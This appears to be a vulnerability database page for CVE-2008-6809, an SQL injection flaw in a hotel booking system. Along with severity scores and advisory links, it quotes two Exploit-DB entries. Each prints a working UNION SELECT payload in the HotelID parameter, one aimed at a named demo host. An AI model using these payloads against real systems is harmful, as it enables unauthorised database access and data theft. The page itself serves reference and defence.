CVE-2008-6809
Published 2009-05-18
Priority P3 41 | high | 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.98% (57.8th percentile)
SQL injection vulnerability in hotel_habitaciones.php in Venalsur Booking Centre Booking System for Hotels Group 2.01 allows remote attackers to execute arbitrary SQL commands via the HotelID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bookingcentre | booking_system_for_hotels_group | — | — |
No detection rules found.
Exploit-DB
V.H.S. Booking - 'hotel_habitaciones.php?HotelID' SQL Injection
exploitdb·2009-12-17
---
[?] -------------------------{In The Name Of Allah The Merciful}----------------------
[?]
[~] Type: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
[~] Vendor: www.bookingcentre.eu
[*] Software: Hotels Group
[*] author: ((R3d-D3v!L))
[*] Date: 18.dec.2009
[*] T!ME: 12:00 am
[?] Home: WwW.xP10.ME
[?] contact: N/A
[?]
[?]----------------------{DEV!L'5 of SYST3M}------------------
[*] Err0r C0N50L3:
http://server/www_en/hotel_habitaciones.php?HotelID=(SQL)
[~] (SQL):
1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
! GAZA !N 0uR HEART's blood and M!ND
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}---------------------
Exploit-DB
Booking Centre 2.01 - 'HotelID' SQL Injection
exploitdb·2008-11-27
---
[~] ----------------------------In the Name of Allah, the Most Gracious, the Most Merciful------------------------------
[~]Type: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
[~]Vendor: www.bookingcentre.eu
[~]Software: Hotels Group
[~]author: ((Ñ3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~] Exploit:
http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)
[~] (SQL):
1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
[~]--------------------------------------------------------------------------------
[~] Greetz tO: keta & m4n0n & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & Ø
No writeups or analysis indexed.
http://secunia.com/advisories/32430
http://www.securityfocus.com/bid/32512
https://exchange.xforce.ibmcloud.com/vulnerabilities/46913
https://www.exploit-db.com/exploits/7253
Published: 2009-05-18